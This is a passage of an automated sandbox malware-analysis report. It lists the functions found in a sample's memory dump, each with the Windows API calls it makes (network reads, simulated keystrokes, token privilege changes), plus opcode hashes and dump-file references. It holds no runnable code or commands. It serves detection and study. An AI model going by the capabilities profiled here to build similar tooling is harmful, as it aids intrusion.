                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Cursor$DialogLongMenuNtdllPopupProc_TrackWindow
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1423138444-0
                                                                                                                                                                  • Opcode ID: d1ae1a12907c05f49dfc269778495b3879c7e39ac022abd37f40eb7ee6ee8851
                                                                                                                                                                  • Instruction ID: 438b45b98b796cbfb8a71071175fe16e4241c6ad5e1ee4a00a0b1cd42d147a76
                                                                                                                                                                  • Opcode Fuzzy Hash: d1ae1a12907c05f49dfc269778495b3879c7e39ac022abd37f40eb7ee6ee8851
                                                                                                                                                                  • Instruction Fuzzy Hash: 15213535610028EFEB298F55D898EFA7FB5FF89B60F044069F905472A2C7349D61DB90
                                                                                                                                                                  Function 0022220C Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 560stringCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • lstrlenW.KERNEL32(?,?,?,00000000), ref: 0022221E
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: lstrlen
                                                                                                                                                                  • String ID: ($|
                                                                                                                                                                  • API String ID: 1659193697-1631851259
                                                                                                                                                                  • Opcode ID: 260c1500b42eddb68384671429e96a86aa12b3d1680830f9bd9eebfdb91fa037
                                                                                                                                                                  • Instruction ID: 5cfd39e142d0792398c2faf3300e578d8c1e40ad0d5d499e4af18786f92f0e30
                                                                                                                                                                  • Opcode Fuzzy Hash: 260c1500b42eddb68384671429e96a86aa12b3d1680830f9bd9eebfdb91fa037
                                                                                                                                                                  • Instruction Fuzzy Hash: 86323375A10615EFC728CF69D480A6AB7F0FF48320B11C56EE89ADB3A1E771E951CB40
                                                                                                                                                                  Function 001FAD5C Relevance: 4.9, APIs: 3, Instructions: 378nativeCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 001FAF7D: GetWindowLongW.USER32(?,000000EB), ref: 001FAF8E
                                                                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,?,?,?,?), ref: 001FAE5E
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: DialogLongNtdllProc_Window
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2065330234-0
                                                                                                                                                                  • Opcode ID: 62a9065c6e51d8abe92e59f70bcb49c3b5da846832dff0b4d6b6318a4ba9b0ee
                                                                                                                                                                  • Instruction ID: 829ed8751bb9b36dd476b67ca8345ebd8fd42b2349820507d6db4d836607aa4f
                                                                                                                                                                  • Opcode Fuzzy Hash: 62a9065c6e51d8abe92e59f70bcb49c3b5da846832dff0b4d6b6318a4ba9b0ee
                                                                                                                                                                  • Instruction Fuzzy Hash: 40A13BE012410DBEEB6C6F295D88D7F3D5CDF82352B914529FA0AD61A2CB2C8C259673
                                                                                                                                                                  Function 0023550C Relevance: 4.7, APIs: 3, Instructions: 155networkfileCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00234A1E,00000000), ref: 002355FD
                                                                                                                                                                  • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00235629
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Internet$AvailableDataFileQueryRead
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 599397726-0
                                                                                                                                                                  • Opcode ID: e05c596ef4978ff2af533462b0679344a48d44e1e8b479fa74874d2df6a17dac
                                                                                                                                                                  • Instruction ID: c35f4a78b613c5625e6d69e968ef3a5a9c8c7c4fa891f0665a574d309dcbfb86
                                                                                                                                                                  • Opcode Fuzzy Hash: e05c596ef4978ff2af533462b0679344a48d44e1e8b479fa74874d2df6a17dac
                                                                                                                                                                  • Instruction Fuzzy Hash: 9A4118F1620B19BFEB119E90CC85FBFB7BDEB40314F50405AF609A6181DAB0AE619E50
                                                                                                                                                                  Function 0022EA85 Relevance: 4.6, APIs: 3, Instructions: 72COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • SetErrorMode.KERNEL32(00000001), ref: 0022EA95
                                                                                                                                                                  • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0022EAEF
                                                                                                                                                                  • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0022EB3C
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorMode$DiskFreeSpace
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1682464887-0
                                                                                                                                                                  • Opcode ID: efdef96332f405c15a337e550c4649123193470814183cac412dbe0897b72f5a
                                                                                                                                                                  • Instruction ID: a49e1bb9d958fd864763d8b156bd21cc1a6364e65cc615f91fd2672d55e0c3db
                                                                                                                                                                  • Opcode Fuzzy Hash: efdef96332f405c15a337e550c4649123193470814183cac412dbe0897b72f5a
                                                                                                                                                                  • Instruction Fuzzy Hash: 8B217A35A10218EFCB00DFA5E894AEEBBB8FF48314F1480A9E909AB251DB719915CB50
                                                                                                                                                                  Function 001FAFB4 Relevance: 3.1, APIs: 2, Instructions: 82nativeCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 001FAF7D: GetWindowLongW.USER32(?,000000EB), ref: 001FAF8E
                                                                                                                                                                    • Part of subcall function 001FB155: GetWindowLongW.USER32(?,000000EB), ref: 001FB166
                                                                                                                                                                  • GetParent.USER32(?), ref: 0025F4B5
                                                                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,00000133,?,?,?,?,?,?,?,?,001FADDD,?,?,?,00000006,?), ref: 0025F52F
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: LongWindow$DialogNtdllParentProc_
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 314495775-0
                                                                                                                                                                  • Opcode ID: 3bfb780b06c343c049652ff8f4091edd8c94dbc7713d1bd26d7b9ffdcdab248c
                                                                                                                                                                  • Instruction ID: 20236d7161402f1e628750e9f9e33845d47650d25b3c9427f7d1132c64eccc6b
                                                                                                                                                                  • Opcode Fuzzy Hash: 3bfb780b06c343c049652ff8f4091edd8c94dbc7713d1bd26d7b9ffdcdab248c
                                                                                                                                                                  • Instruction Fuzzy Hash: A82199356041086FDB249F28D988ABA3BA6EF46370F184264F7254B2F2DB709D25D711
                                                                                                                                                                  Function 0022702F Relevance: 3.1, APIs: 2, Instructions: 58COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 0022708D
                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00227098
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseControlDeviceHandle
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2349616827-0
                                                                                                                                                                  • Opcode ID: 75cc019fcba75d581c1a36bd4f47c93ee693b87f7da6b2769a019d2be2d3267e
                                                                                                                                                                  • Instruction ID: c2ffcaae16684cc5443c5306f19f21a8b2af4fad1e953ee93501d883be57197d
                                                                                                                                                                  • Opcode Fuzzy Hash: 75cc019fcba75d581c1a36bd4f47c93ee693b87f7da6b2769a019d2be2d3267e
                                                                                                                                                                  • Instruction Fuzzy Hash: 03115E71E15228BFEB108F94EC45FAEBBBCEB49B10F108152F904E7290D7B05A058BA1
                                                                                                                                                                  Function 0022FD47 Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 0022FD71
                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 0022FDA1
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Find$CloseFileFirst
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2295610775-0
                                                                                                                                                                  • Opcode ID: 92341f4836a7eee8886deb3d090e19ed7fa8db77a1dcfc58f64d513d8be81a17
                                                                                                                                                                  • Instruction ID: 36706adc63b3ec402003db5cfc672fc92a5faa89667fb247f4e31168cac3556c
                                                                                                                                                                  • Opcode Fuzzy Hash: 92341f4836a7eee8886deb3d090e19ed7fa8db77a1dcfc58f64d513d8be81a17
                                                                                                                                                                  • Instruction Fuzzy Hash: EA11C4316106049FD700DF69D849A2AF7E8FF98324F00856EF9A9DB291DB74EC058B81
                                                                                                                                                                  Function 0024F0A1 Relevance: 3.0, APIs: 2, Instructions: 46nativewindowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 001FAF7D: GetWindowLongW.USER32(?,000000EB), ref: 001FAF8E
                                                                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,0000002B,?,?,?,?,?,?,?,0025F352,?,?,?), ref: 0024F115
                                                                                                                                                                    • Part of subcall function 001FB155: GetWindowLongW.USER32(?,000000EB), ref: 001FB166
                                                                                                                                                                  • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 0024F0FB
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: LongWindow$DialogMessageNtdllProc_Send
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1273190321-0
                                                                                                                                                                  • Opcode ID: 423cae1c5eee4b696c75b979e6f4cad2c22e0fb846f6fb17627875f46a7bc4be
                                                                                                                                                                  • Instruction ID: 15eba0574a4309bdd63aafc8210a3be590a2e3e6b96e350e3cc8bab1da08e334
                                                                                                                                                                  • Opcode Fuzzy Hash: 423cae1c5eee4b696c75b979e6f4cad2c22e0fb846f6fb17627875f46a7bc4be
                                                                                                                                                                  • Instruction Fuzzy Hash: 3201B535210204EFDB259F14ED49F6A3F66FFC6364F184124F91A1B2A1C7719822DB51
                                                                                                                                                                  Function 0024F45A Relevance: 3.0, APIs: 2, Instructions: 32nativeCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • ClientToScreen.USER32(?,?), ref: 0024F47D
                                                                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,00000200,?,?,?,?,?,?,?,0025F42E,?,?,?,?,?), ref: 0024F4A6
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ClientDialogNtdllProc_Screen
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3420055661-0
                                                                                                                                                                  • Opcode ID: ec4c51ea18329ba9444529fc11f6bc4e06b80272155182d2332f914a71554f7f
                                                                                                                                                                  • Instruction ID: b8727e331c05e2b36de7766d74451e261426d84264b7b21d1318bb6883f66502
                                                                                                                                                                  • Opcode Fuzzy Hash: ec4c51ea18329ba9444529fc11f6bc4e06b80272155182d2332f914a71554f7f
                                                                                                                                                                  • Instruction Fuzzy Hash: A5F0307691011CFFEF049F55EC099AE7FB8FF44351F14401AF902A2160D7B5AA51DB60
                                                                                                                                                                  Function 0022D712 Relevance: 3.0, APIs: 2, Instructions: 30windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,0023C2E2,?,?,00000000,?), ref: 0022D73F
                                                                                                                                                                  • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,0023C2E2,?,?,00000000,?), ref: 0022D751
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorFormatLastMessage
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3479602957-0
                                                                                                                                                                  • Opcode ID: 173c31c08ffc468eb63f010cb07e50b660c562934b8a4442c97563e5dda49e21
                                                                                                                                                                  • Instruction ID: a6e6e4ba491b7afcbf5a9f6d33c8b5280966dfe85530a61baa91dcfd777c2f45
                                                                                                                                                                  • Opcode Fuzzy Hash: 173c31c08ffc468eb63f010cb07e50b660c562934b8a4442c97563e5dda49e21
                                                                                                                                                                  • Instruction Fuzzy Hash: C4F0E23551032DBBDB10AFA4DC48FEA776CAF49350F008011F905D2181D3709980CFA0
                                                                                                                                                                  Function 00224B52 Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00224B89
                                                                                                                                                                  • keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 00224B9C
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: InputSendkeybd_event
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3536248340-0
                                                                                                                                                                  • Opcode ID: 71d291f1df8d6d4fde866cc23dd7b31bb906c1d4ecfe43f2cc025b7e06cac599
                                                                                                                                                                  • Instruction ID: 31ef8aa8fd09638adf9d662d9bba204145c3a95da592aa8acc0abce929186dc6
                                                                                                                                                                  • Opcode Fuzzy Hash: 71d291f1df8d6d4fde866cc23dd7b31bb906c1d4ecfe43f2cc025b7e06cac599
                                                                                                                                                                  • Instruction Fuzzy Hash: 1AF06D70D1024EAFDB059FA1D809BBE7BB4AF00309F00C40AF951A5191D3B9C6119F94
                                                                                                                                                                  Function 0021B8B0 Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,0021B9EC), ref: 0021B8C5
                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,0021B9EC), ref: 0021B8D7
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 81990902-0
                                                                                                                                                                  • Opcode ID: 6b511c2ee5d9e0bef0ebe88523678decd776153716af9bbb1f250a3b10a10705
                                                                                                                                                                  • Instruction ID: 395a31563f065e932f4f0e1522868804f53b8336d4beba6f13ccdacf3e261092
                                                                                                                                                                  • Opcode Fuzzy Hash: 6b511c2ee5d9e0bef0ebe88523678decd776153716af9bbb1f250a3b10a10705
                                                                                                                                                                  • Instruction Fuzzy Hash: 8FE0B672414611AFE7262B64FC49EB6BBF9EF04311B11C869F49A81471DBA2ACE0DB10
                                                                                                                                                                  Function 0024F594 Relevance: 3.0, APIs: 2, Instructions: 21nativeCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetWindowLongW.USER32(?,000000EC), ref: 0024F59C
                                                                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,00000084,00000000,?,?,0025F3AD,?,?,?,?), ref: 0024F5C6
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
